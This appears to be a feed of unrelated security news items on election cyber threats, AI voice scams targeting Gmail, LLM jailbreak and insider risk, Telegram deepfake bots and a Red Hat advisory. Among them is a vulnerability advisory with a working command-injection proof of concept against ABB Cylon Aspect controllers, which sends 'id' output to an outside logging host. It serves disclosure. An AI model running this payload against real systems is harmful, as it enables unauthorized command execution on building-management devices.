Organizations should be on high alert until next month's US presidential election to ensure the integrity of the voting process, researchers warn.

Source: Jon Helgason via Alamy Stock Photo

Cyber-threat actors have ramped up their targeting of the 2024 US elections with a flood of malicious activity expected to peak over the next month, aimed at causing disruption to voters and the election process and requiring increased vigilance on the part of stakeholders.

Specifically, attackers have bolstered election-related threat activity since the beginning of the year with an increase in the sale of phishing kits targeting US voters and campaign donors; the registration of more than 1,000 domains aimed at exploiting election-related content for malicious purposes; and increased ransomware activity targeting government entities, according to research from FortiGuard Labs Threat Research released today.

Since the inception of Internet-related threats, cyber-threat actors have typically increased malicious activity ahead of elections, notes Derek Manky, chief security strategist and vice president of global threat intelligence at Fortinet. However, they aim to be especially disruptive during the current election cycle, requiring that all stakeholders be prepared to fend off malicious actors in the upcoming weeks to protect election outcomes.

"As the 2024 US presidential election approaches, it's critical to recognize and understand the cyber threats that may impact the integrity and trustworthiness of the election process and the welfare of the participating citizens," he says.

Indeed, separate research has found that adversaries from Russia, China, and Iran in particular have been using cyber operations to stoke discord and influence election outcomes rather than make direct attacks on voting machines or other voter infrastructure. These more insidious tactics require a different type of vigilance on the part of defenders, the researchers noted.

**Specific Threats to Watch For**

FortiGuard Labs' latest election-threat research is the result of analysis of threats gathered from January 2024 to August 2024 that may affect US-based entities and the electoral process. The researchers discovered several key areas of threat activity that have been on the rise.

One is a significant increase in the availability of affordable phishing kits on the Dark Web designed to target voters and donors by impersonating the presidential candidates and their campaigns. Specifically, the researchers found kits for $1,260 created to impersonate US presidential candidates and to harvest personal information, including names, addresses, and credit card details.

Part of the phishing activity around the current election cycle also includes an increase of highly convincing mobile scams that use phone calls, voicemails, or messaging services that leverage deepfake technology to spread misinformation, which can affect voter outcomes, notes Alex Quilici, CEO at YouMail.

"AI can now create highly convincing voice attacks that make it sound like a trusted figure, such as a candidate, urging you not to vote or spreading false information," he says. "This kind of deception can seriously undermine public trust and disrupt the electoral process."

Attackers also have registered more than 1,000 new potentially malicious domains since the beginning of 2024 that incorporate election-related content and candidates to lure unsuspecting targets and potentially conduct nefarious activities, the researchers noted. The two most-used hosting providers for these election-themed websites are AMAZON-02 and CLOUDFLARENET, demonstrating that attackers are leveraging known, reputable services to bolster the legitimacy of malicious domains.

Another way cyberattackers can spread misinformation and disrupt the democratic process is through the use of people's personal information to directly target them, the researchers noted. Fortinet found that there currently is an abundance of this type of material on the Dark Web, with more than 1.3 billion rows of combo lists — which include usernames, email addresses, and passwords — of US citizens for sale for nefarious use.

The availability of this data poses a considerable risk for credential-stuffing attacks that allow cybercriminals to gain unauthorized access to people's accounts. Overall, the availability of so much personal data of various election stakeholders creates potential indirect disruption in the voting process, notes Casey Ellis, founder and chief strategy officer at Bugcrowd.

"While it may be difficult to use these records to commit the kind of fraud or attacks that would directly modify the outcome of an election, it's certainly a cheap and simple exercise to simply highlight the possibility of their use as a way to instill distrust in the democratic process, and to potential affect and manipulate voter turnout," he says.

FortiGuard Labs researchers also noted a 28% increase in ransomware attacks against the US government year-over-year based on observed leak sites. This type of activity also can threaten the integrity of the election process by undermining citizens' trust in the ability of the government to protect the personal data they collect from them.

**Protect Election Integrity**

To ensure the US presidential election process runs smoothly for all that wish to participate, Fortinet offered some recommendations to prevent and mitigate attacks between now and election day. The researchers advised that individuals and organizations alike always remain vigilant for suspicious behavior or activity leading up to major election-related events and prioritize good cyber hygiene in general to reduce potential threats.

Organizations, especially those related to the election or government agencies, should prioritize employee training and awareness about the cyber threats that exist that aim to disrupt the election process. Enforcing multifactor authentication and a strong password policy across both individuals' and organizations' online accounts also can protect against intrusion.

Finally, any organization with a stake in the election also should install endpoint protection solutions, patch operating systems and Web servers, and update software regularly to ensure systems are as secure as possible, Fortinet recommended.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Cyberattackers Unleash Flood of Potentially Disruptive Election-Related Activity

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the country, state, locality, organization, and hostname HTTP POST parameters called by the sslCertAjax.php script.

    ABB Cylon Aspect 3.08.00 (sslCertAjax.php) Remote Code ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.00Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an authenticated OS commandinjection vulnerability. This can be exploited to inject and execute arbitraryshell commands through the 'country', 'state', 'locality', 'organization', and'hostname' HTTP POST parameters called by the sslCertAjax.php script.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5842Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5842.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -X POST "http://192.168.73.31/sslCertAjax.php" \> -H "Cookie: PHPSESSID=xxx" \> -d "opType=genCert\> &country=`sleep 1`\> &state=`sleep 2`\> &locality=`sleep 3`\> &organization=`sleep 4`\> &hostname=ZSL$(curl -A `id` remotelog.zeroscience.mk)" ; ./incom -l httplog &<div>Certificate Generation Successful</div>[1]  + 50123 done       incom$$ cat httplog------ remotelog ------GET / HTTP/1.1User-Agent: uid=33(www-data)Host: remotelog.zeroscience.mkAccept: */*------ remotelog ------$ shutdown -h +17 "Good afternoon, good evening and good night."

ABB Cylon Aspect 3.08.00 sslCertAjax.php Remote Command Execution

Typical AI supported scams are after your Google account by pretending to follow up on account recovery requests

Several reputable sources are warning about a very sophisticated Artificial Intelligence (AI) supported type of scam that is bound to trick a lot of people into compromising their Gmail account.

The most recent warning comes from CEO of Y Combinator Garry Tan who posted on X, saying the scammers using AI voices tell you someone has issued a death certificate for you and is trying to recover your account.

> Public service announcement: You should be aware of a pretty elaborate phishing scam using AI voice that claims to be Google Support (caller ID matches, but is not verified)
> 
> DO NOT CLICK YES ON THIS DIALOG— You will be phished
> 
> They claim to be checking that you are alive and… pic.twitter.com/60zeuS2lL8
> 
> — Garry Tan (@garrytan) October 10, 2024

The scammers claim to be checking that you are alive and whether they should disregard a filed death certificate. If you click “Yes, it’s me” on the fake account recovery screen then you’ll likely lose access to your Google account.

In another recent example, Windows expert Sam Mitrovic was targeted by a very similar AI recovery scam.

He explained how the scam unfolds: It starts when he receives a notification of an alleged Gmail account recovery attempt, followed 40 minutes later by a call. The first time Sam misses the call, but when they try the same thing a week later, Sam answers.

In both cases, the notifications come from the US but the calls show “Google Sydney” as the caller. A polite American voice claims there’s been suspicious activity on Sam’s Gmail account and asks whether Sam was travelling.

The caller says there’s been a login attempt from Germany which raises suspicions, given that Sam is at home in the US. The caller says the login has been successful, and that an attacker has had access to Sam’s account for a week and downloaded account data.

Sam remembers the email and missed call from last week, and has the presence of mind to quickly check the caller ID. It looks like a legitimate Google Assistant number.

But knowing how easy it is to spoof a telephone number and pretend to be calling from that number, Sam asks for an email to confirm that the caller actually works for Google. Some typing against the typical background noises of a call center and soon enough the email arrives.

Image courtesy of Sam Mitrovic

The email looks convincing. It comes from a Google domain, has a case number, claims to be from the Google Account Security Team, and it confirms the phone number and the name the caller is using.

While Sam reviews the email, the caller repeatedly says “Hello”. From the pronunciation and the spacing Sam realizes it’s an AI voice and hangs up.

Inspecting the email Sam found that the scammers are using the legitimate Salesforce CRM (customer relationship management) tool which allows you to set the sender to whatever you like and send over Gmail/Google servers.

Other targets that took the scam a little further,  were asked to verify their 2FA, so it stands to reason that the scammers are looking to take over your Google account, but this time for real.

The need to confirm an account recovery, or a password reset, is a notorious method used in phishing attacks. They usually try to trick the target into opening a fake login portal where they need to enter their credentials to report the request as not initiated by them.

Prompt asking: Is it you trying to recover your account?

**How to stay safe**

There are a few signs you can use to identify this type of scams.

The “To” field of the confirmation email Sam received contains an email address cleverly named GoogleMail\[@\]InternalCaseTracking\[.\] com, which is a non-Google domain.

Google Assistant calls usually come from an automated system and only in some cases, from a manual operator. Google Support on the other hand will not contact you unsolicited.

To verify if a security alert is from Google, users can check their **Recent security activity**:

*   Tap your Gmail profile photo in the top right corner
*   Tap **Manage your Google Account**
*   Select the **Security** tab
*   You will see something similar to this:

Here you can find the Review Security Activity button

Any messages claiming to be security alerts from Google that are not listed there will not be from Google.

Do not entertain these scammers for longer than necessary. It doesn’t take them very long to fingerprint your voice which would allow their AI to impersonate you by using your voice.

**We don’t just report on threats – we help protect your social media**

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Cyrus, powered by Malwarebytes.

 AI scammers target Gmail accounts, say they have your death certificate 

Red Hat Security Advisory 2024-8081-03 - An update for OpenIPMI is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8081.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: OpenIPMI security updateAdvisory ID:        RHSA-2024:8081-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8081Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-42934====================================================================Summary: An update for OpenIPMI is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenIPMI packages provide command-line tools and utilities to access platform information using Intelligent Platform Management Interface (IPMI). System administrators can use OpenIPMI to manage systems and to perform system health monitoring.Security Fix(es):* openipmi: missing check on the authorization type on incoming LAN messages in IPMI simulator (CVE-2024-42934)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-42934References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2308375

Red Hat Security Advisory 2024-8081-03

The inherent intelligence of large language models gives them unprecedented capabilities like no other enterprise tool before.

Shaked Reiner, Principal Security Researcher, CyberArk Labs

October 15, 2024

5 Min Read

Source: Krot\_Studio via Alamy Stock Photo

Today, security teams are treating large language models (LLMs) as a vital and trusted business tool that can automate tasks, free up employees to do more strategic functions, and give their company a competitive edge. However, the inherent intelligence of LLMs gives them unprecedented capabilities like no other enterprise tool before. The models are inherently susceptible to manipulation, so they behave in ways they aren't supposed to, and adding more capabilities makes the impact of that risk even more severe.

This is particularly risky if the LLM is integrated with another system, such as a database containing sensitive financial information. It's similar to an enterprise giving a random contractor access to sensitive systems, telling them to follow all orders given to them by anyone, and trusting them not to be susceptible to coercion.

Because LLMs lack critical thinking capabilities and are designed to just respond to queries with guardrails of limited degrees of strength, they need to be treated as potential adversaries, and security architectures should be designed following a new "assume breach" paradigm. Security teams must operate under the assumption that the LLM can and will act in the best interest of an attacker and build protections around it.

**LLM Security Threats to the Enterprise**

There are a number of security risks LLMs pose to enterprises. One common risk is that they can be jailbroken and forced to operate in a way they were not intended for. This can be accomplished by inputting a prompt in a manner that breaks the model's safety alignment. For example, many LLMs are designed to not provide detailed instructions when prompted for how to make a bomb. They respond that they can't answer that prompt. But there are certain techniques that can be used to get around the guardrails. An LLM that has access to internal corporate user and HR data could conceivably be tricked into providing details and analysis about employee working hours, history, and the org chart to reveal information that could be used for phishing and other cyberattacks.

A second, bigger threat to organizations is that LLMs can contribute to remote code execution (RCE) vulnerabilities in systems or environments. Threat researchers presented a paper at Black Hat Asia this spring that found that 31% of the targeted code bases — mostly GitHub repositories of frameworks and tools that companies deploy in their networks — had remote execution vulnerabilities caused by LLMs.

When LLMs are integrated with other systems within the organization, the potential attack surface expands. For example, if an LLM is integrated with a core business operation like finance or auditing, a jailbreak can be used to trigger a particular action within that other system. This capability could lead to lateral movement to other applications, theft of sensitive data, and even making changes to data within financial documents that might be shared externally, impacting share price or otherwise causing harm to the business.

**Fixing the Root Cause Is More Than a Patch Away**

These are not theoretical risks. A year ago, a vulnerability was discovered in the popular LangChain framework for developing LLM-integrated apps, and other iterations of it have been reported recently. The vulnerability could be used by an attacker to make the LLM execute code, say a reverse shell, which would give access to the server running the system.

Currently, there aren't sufficient security measures in place to address these issues. There are content filtering systems, designed to identify and block malicious or harmful content, possibly based on static analysis or filtering and block lists. And Meta offers Llama Guard, which is an LLM trained to identify jailbreaks and malicious attempts at manipulating other LLMs. But that is more of a holistic approach to treating the problem externally, rather than addressing the root cause.

It's not an easy problem to fix, because it's difficult to detect the root cause. With traditional vulnerabilities, you can patch the specific line of code that is problematic. But LLMs are more obscure, and we don't have visibility into the black box that we need to do specific code fixes like that. The big LLM vendors are working on security, but it's not a top priority; they're all competing for market share, so they're focused on features.

Despite these limitations, there are things enterprises can do to protect themselves. Here are five recommendations to help mitigate the insider threat that LLMs can become:

1.  Enforce the privilege of least privilege: Provide the bare minimum privilege needed to perform a task. Ask yourself: How does providing least privilege materially affect the functionality and reliability of the LLM?
    
2.  Don't use an LLM as a security perimeter: Only give it the abilities you intend it to use, and don't rely on a system prompt or alignment to enforce security.
    
3.  Limit the LLM's scope of action: Restrict its capabilities by making it impersonate the end user.
    
4.  Sanitize the training data and LLM output and the training data: Before using any LLM, make sure there is no sensitive data going into the system, and validate all output. For example, remove XSS payloads that are in the form of markdown syntax or HTML tags.
    
5.  Use a sandbox: In the event you want to use the LLM to run code, you will want to keep the LLM in a protected area.
    

The OWASP Top 10 list for LLMs has additional information and recommendations, but the industry is in the early stages of research in this field. The pace of development and adoption has happened so quickly that threat intel and risk mitigation haven't been able to keep up. Until then, enterprises need to use the insider threat paradigm to protect against LLM threats.

**About the Author**

Principal Security Researcher, CyberArk Labs

Shaked Reiner is a principal security researcher at CyberArk Labs with over a decade of experience in reverse engineering and vulnerability research. His expertise spans malware, low-level systems, operating systems, blockchain, and AI. Shaked has a passion for researching peculiar machines and enjoys explaining complex ideas in an accessible way, whether in cybersecurity or philosophy.

LLMs Are a New Type of Insider Adversary

A heated regulatory landscape, uncertainty over AI use, and how it all ties back to cybersecurity means CISOs have to add privacy to their portfolios.

Source: Leo Wolfert via Alamy Stock Photo

Years ago, when Mark Eggleston was tasked with building a privacy program for a national healthcare provider, he saw firsthand the importance of cross-functional collaboration.

"I needed legal experts to debate the HIPAA Privacy, NPRM \[Notice of Proposed Rulemaking\], final rule, and guidance and convert those requirements into internal policies," Eggleston recalls. "CISOs can bring efficiency and reliance to these procedures by implementing technical controls."

Eggleston, who is currently the chief information security officer (CISO) at CSC, a provider of business administration and compliance solutions, now recognizes how this collaboration underscores a larger trend occurring: CISOs are increasingly taking responsibility for privacy within organizations. According to research from IANS, CISO ownership of privacy has surged from 35% to 47% over the past five years. This growing role comes as privacy management and cybersecurity become more intertwined, fueled by regulatory pressures; evolving questions and concerns about certain technologies, like artificial intelligence (AI); and the always present desire to avoid becoming a victim of a data breach.

Traditionally, privacy and security were considered separate domains within an organization. Privacy was the responsibility of legal or compliance teams, while CISOs focused on protecting the organization from cyber threats. However, the line between these two areas is blurring, and more CISOs are being asked to handle privacy functions.

"When a CISO conducts a risk assessment or looks at data flow, they're already thinking about how to protect that information," says Rebecca Herold, CEO of The Privacy Professor and an IANS faculty member. Adding privacy to the role simply formalizes what they're already doing in many cases, she says.

Yunique Demann, senior director and data protection officer at NTT Data Americas, began her career in a security role and then moved into a privacy position, giving her a view into both disciplines.

"With the rise in data breaches, regulations, and regulatory scrutiny outside your legal, risk, or compliance functions, CISOs are becoming a natural fit to oversee privacy controls," she says. "Privacy is one of many areas that have impacted a CISO's role."

**Why CISOs Are Taking on Privacy Roles**

Another driver behind the shift in responsibility is the ever-changing regulatory landscape. Privacy laws, like the General Data Protection Regulation (GDPR) in Europe and the California Consumer Privacy Act (CCPA) in the US, are placing greater demands on organizations to protect personal data. These regulations require organizations to have robust privacy controls, and, in many cases, the CISO is seen as integral to helping to oversee those efforts. CSC's Eggleston, who has held both CISO and chief privacy officer (CPO) roles, says the shift has been afoot for years, as CISOs have had to work with other departments where privacy is also essential.

"Most CISOs are already working strongly with human resources and legal teams, and the focus on privacy makes it paramount to continue to do so, as both HR and legal have core interest in privacy matters," he says. "Even the NIST Cybersecurity Framework is now integrating privacy into its guidelines."

With CISOs taking on more privacy duties comes a growing need to balance these responsibilities with their traditional focus on cybersecurity. There is also the potential for a conflict of interest, Demann says.

"But this is handled when operational privacy responsibilities are given to a DPO \[data protection officer\], while keeping the reporting line into security," she says.

In addition to regulatory pressures, advances in technology, such as the widespread adoption of AI, are contributing to CISOs' expanded role in privacy management. A recent survey from the International Association of Privacy Professionals (IAPP) found that 69% of chief privacy officers now have additional responsibility for AI governance, and 37% for cybersecurity regulatory compliance. And for good reason, says Demann, because many areas around AI require more scrutiny from both a privacy and security perspective.

"Privacy risks occur when the use of AI conflicts with these fundamentals and lacks transparency and incorporates bias in the process," she says. "Just because your LLM \[large language model\] can utilize huge amounts of data points, it doesn't mean it should, especially without consent of the individuals whose data you are using. Consent should be clear and explicit. Unfortunately, we are finding too many situations where consent is hidden."

**Reskilling to Handle Privacy**

The skills required for privacy management are also evolving, and CISOs must be prepared to adapt.

"Privacy is fundamentally about protecting individuals' rights and ensuring the processing of personal data is performed in accordance with applicable laws," Demann says. "This requires a deeper understanding of legal, ethical, and regulatory frameworks and a focus on data governance, consent management, and transparency."

She encourages CISOs to engage with privacy communities, collaborate with privacy leads, and actively seek opportunities to expand their knowledge of privacy issues.

For CISOs, collaboration with CPOs and legal departments is also key to ensuring both security and privacy compliance within their organizations. Demann recommends regular communication and joint initiatives, such as combined tabletop exercises and industry presentations, to create a unified approach to privacy and security.

"The more privacy and security leads can show up together, the easier it is for the organization to have a strategic approach," she says.

Eggleston stresses the importance of staying informed through think tank digests, privacy updates from legal firms, and ongoing discussions with jurisdictional staff.

"Many EMEA countries have much more detailed and stronger requirements for privacy," he notes, citing Luxembourg's Professional Secrecy obligation as an example.

Looking ahead, CISOs need to be prepared to navigate emerging privacy trends, whether or not privacy is in their purview. As the role expands, they will need to continue building their knowledge of privacy laws and collaborating across departments to protect both company data and individuals' rights.

"Security is about confidentiality, and privacy is fundamentally about confidentiality," Eggleston concludes. "Privacy and security are stronger together."

**About the Author**

Contributing Writer, Dark Reading

Joan Goodchild is a veteran journalist, editor, and writer who has been covering security for more than a decade. She has written for several publications and previously served as editor-in-chief for CSO Online.

CISOs' Privacy Responsibilities Keep Growing

Global Intelligence claims its Cybercheck technology can help cops find key evidence to nail a case. But a WIRED investigation reveals the smoking gun often appears far less solid.

This AI Tool Helped Convict People of Murder. Then Someone Took a Closer Look

Bots that “remove clothes” from images have run rampant on the messaging app, allowing people to create nonconsensual deepfake images even as lawmakers and tech companies try to crack down.

In early 2020, deepfake expert Henry Ajder uncovered one of the first Telegram bots built to “undress” photos of women using artificial intelligence. At the time, Ajder recalls, the bot had been used to generate more than 100,000 explicit photos—including those of children—and its development marked a “watershed” moment for the horrors deepfakes could create. Since then, deepfakes have become more prevalent, more damaging, and easier to produce.

Now, a WIRED review of Telegram communities involved with the explicit nonconsensual content has identified at least 50 bots that claim to create explicit photos or videos of people with only a couple of clicks. The bots vary in capabilities, with many suggesting they can “remove clothes” from photos while others claim to create images depicting people in various sexual acts.

The 50 bots list more than 4 million “monthly users” combined, according to WIRED's review of the statistics presented by each bot. Two bots listed more than 400,000 monthly users each, while another 14 listed more than 100,000 members each. The findings illustrate how widespread explicit deepfake creation tools have become and reinforce Telegram’s place as one of the most prominent locations where they can be found. However, the snapshot, which largely encompasses English-language bots, is likely a small portion of the overall deepfake bots on Telegram.

“We’re talking about a significant, orders-of-magnitude increase in the number of people who are clearly actively using and creating this kind of content,” Ajder says of the Telegram bots. “It is really concerning that these tools—which are really ruining lives and creating a very nightmarish scenario primarily for young girls and for women—are still so easy to access and to find on the surface web, on one of the biggest apps in the world.”

Explicit nonconsensual deepfake content, which is often referred to as nonconsensual intimate image abuse (NCII), has exploded since it first emerged at the end of 2017, with generative AI advancements helping fuel recent growth. Across the internet, a slurry of “nudify” and “undress” websites sit alongside more sophisticated tools and Telegram bots, and are being used to target thousands of women and girls around the world—from Italy’s prime minister to school girls in South Korea. In one recent survey, a reported 40 percent of US students were aware of deepfakes linked to their K-12 schools in the last year.

The Telegram bots identified by WIRED are supported by at least 25 associated Telegram channels—where people can subscribe to newsfeed-style updates—that have more than 3 million combined members. The Telegram channels alert people about new features provided by the bots and special offers on “tokens” that can be purchased to operate them, and often act as places where people using the bots can find links to new ones if they are removed by Telegram.

After WIRED contacted Telegram with questions about whether it allows explicit deepfake content creation on its platform, the company deleted the 75 bots and channels WIRED identified. The company did not respond to a series of questions or comment on why it had removed the channels.

Additional nonconsensual deepfake Telegram channels and bots later identified by WIRED show the scale of the problem. Several channel owners posted that their bots had been taken down, with one saying, “We will make another bot tomorrow.” Those accounts were also later deleted.

**Hiding in Plain Sight**

Telegram bots are, essentially, small apps that run inside of Telegram. They sit alongside the app’s channels, which can broadcast messages to an unlimited number of subscribers; groups where up to 200,000 people can interact; and one-to-one messages. Developers have created bots where people take trivia quizzes, translate messages, create alerts, or start Zoom meetings. They’ve also been co-opted for creating abusive deepfakes.

Due to the harmful nature of the deepfake tools, WIRED did not test the Telegram bots and is not naming specific bots or channels. While the bots had millions of monthly users, according to Telegram’s statistics, it is unclear how many images the bots may have been used to create. Some users, who could be in multiple channels and bots, may have created zero images; others could have created hundreds.

Many of the deepfake bots viewed by WIRED are clear about what they have been created to do. The bots’ names and descriptions refer to nudity and removing women’s clothes. “I can do anything you want about the face or clothes of the photo you give me,” the creators’ of one bot wrote. “Experience the shock brought by AI,” another says. Telegram can also show “similar channels” in its recommendation tool, helping potential users bounce between channels and bots.

Almost all of the bots require people to buy “tokens” to create images, and it is unclear if they operate in the ways they claim. As the ecosystem around deepfake generation has flourished in recent years, it has become a potentially lucrative source of income for those who create websites, apps, and bots. So many people are trying to use “nudify” websites that Russian cybercriminals, as reported by 404Media, have started creating fake websites to infect people with malware.

While the first Telegram bots, identified several years ago, were relatively rudimentary, the technology needed to create more realistic AI-generated images has improved—and some of the bots are hiding in plain sight.

One bot with more than 300,000 monthly users did not reference any explicit material in its name or landing page. However, once a user clicks to use the bot, it claims it has more than 40 options for images, many of which are highly sexual in nature. That same bot has a user guide, hosted on the web outside of Telegram, describing how to create the highest-quality images. Bot developers can require users to accept terms of service, which may forbid users from uploading images without the consent of the person depicted or images of children, but there appears to be little or no enforcement of these rules.

Another bot, which had more than 38,000 users, claimed people could send six images of the same man or woman—it is one of a small number that claims to create images of men—to “train” an AI model, which could then create new deepfake images of that individual. Once users joined one bot, it would present a menu of 11 “other bots” from the creators, likely to keep systems online and try to avoid removals.

“These types of fake images can harm a person’s health and well-being by causing psychological trauma and feelings of humiliation, fear, embarrassment, and shame,” says Emma Pickering, the head of technology-facilitated abuse and economic empowerment at Refuge, the UK’s largest domestic abuse organization. “While this form of abuse is common, perpetrators are rarely held to account, and we know this type of abuse is becoming increasingly common in intimate partner relationships.”

As explicit deepfakes have become easier to create and more prevalent, lawmakers and tech companies have been slow to stem the tide. Across the US, 23 states have passed laws to address nonconsensual deepfakes, and tech companies have bolstered some policies. However, apps that can create explicit deepfakes have been found in Apple and Google’s app stores, explicit deepfakes of Taylor Swift were widely shared on X in January, and Big Tech sign-in infrastructure has allowed people to easily create accounts on deepfake websites.

Kate Ruane, director of the Center for Democracy and Technology’s free expression project, says most major technology platforms now have policies prohibiting nonconsensual distribution of intimate images, with many of the biggest agreeing to principles to tackle deepfakes. “I would say that it’s actually not clear whether nonconsensual intimate image creation or distribution is prohibited on the platform,” Ruane says of Telegram’s terms of service, which are less detailed than other major tech platforms.

Telegram’s approach to removing harmful content has long been criticized by civil society groups, with the platform historically hosting scammers, extreme right-wing groups, and terrorism-related content. Since Telegram CEO and founder Pavel Durov was arrested and charged in France in August relating to a range of potential offenses, Telegram has started to make some changes to its terms of service and provide data to law enforcement agencies. The company did not respond to WIRED’s questions about whether it specifically prohibits explicit deepfakes.

**Execute the Harm**

Ajder, the researcher who discovered deepfake Telegram bots four years ago, says the app is almost uniquely positioned for deepfake abuse. “Telegram provides you with the search functionality, so it allows you to identify communities, chats, and bots,” Ajder says. “It provides the bot-hosting functionality, so it's somewhere that provides the tooling in effect. Then it’s also the place where you can share it and actually execute the harm in terms of the end result.”

In late September, several deepfake channels started posting that Telegram had removed their bots. It is unclear what prompted the removals. On September 30, a channel with 295,000 subscribers posted that Telegram had “banned” its bots, but it posted a new bot link for users to use. (The channel was removed after WIRED sent questions to Telegram.)

“One of the things that’s really concerning about apps like Telegram is that it is so difficult to track and monitor, particularly from the perspective of survivors,” says Elena Michael, the cofounder and director of #NotYourPorn, a campaign group working to protect people from image-based sexual abuse.

Michael says Telegram has been “notoriously difficult” to discuss safety issues with, but notes there has been some progress from the company in recent years. However, she says the company should be more proactive in moderating and filtering out content itself.

“Imagine if you were a survivor who’s having to do that themselves, surely the burden shouldn't be on an individual,” Michael says. “Surely the burden should be on the company to put something in place that's proactive rather than reactive.”

Millions of People Are Using Abusive AI ‘Nudify’ Bots on Telegram

China's National Computer Virus Emergency Response Center (CVERC) has doubled down on claims that the threat actor known as the Volt Typhoon is a fabrication of the U.S. and its allies.
The agency, in collaboration with the National Engineering Laboratory for Computer Virus Prevention Technology, went on to accuse the U.S. federal government, intelligence agencies, and Five Eyes countries of

China's National Computer Virus Emergency Response Center (CVERC) has doubled down on claims that the threat actor known as **the Volt Typhoon** is a fabrication of the U.S. and its allies.

The agency, in collaboration with the National Engineering Laboratory for Computer Virus Prevention Technology, went on to accuse the U.S. federal government, intelligence agencies, and Five Eyes countries of conducting cyber espionage activities against China, France, Germany, Japan, and internet users globally.

It also said there's "ironclad evidence" indicating that the U.S. carries out false flag operations in an attempt to conceal its own malicious cyber attacks, adding it's inventing the "so-called danger of Chinese cyber attacks" and that it has established a "large-scale global internet surveillance network."

"And the fact that the U.S. adopted supply chain attacks, implanted backdoors in internet products and 'pre-positioned' has completely debunked the Volt Typhoon – a political farce written, directed, and acted by the U.S. federal government," it said.

"The U.S. military base in Guam has not been a victim of the Volt Typhoon cyber attacks at all, but the initiator of a large number of cyberattacks against China and many Southeast Asian countries and the backhaul center of stolen data."

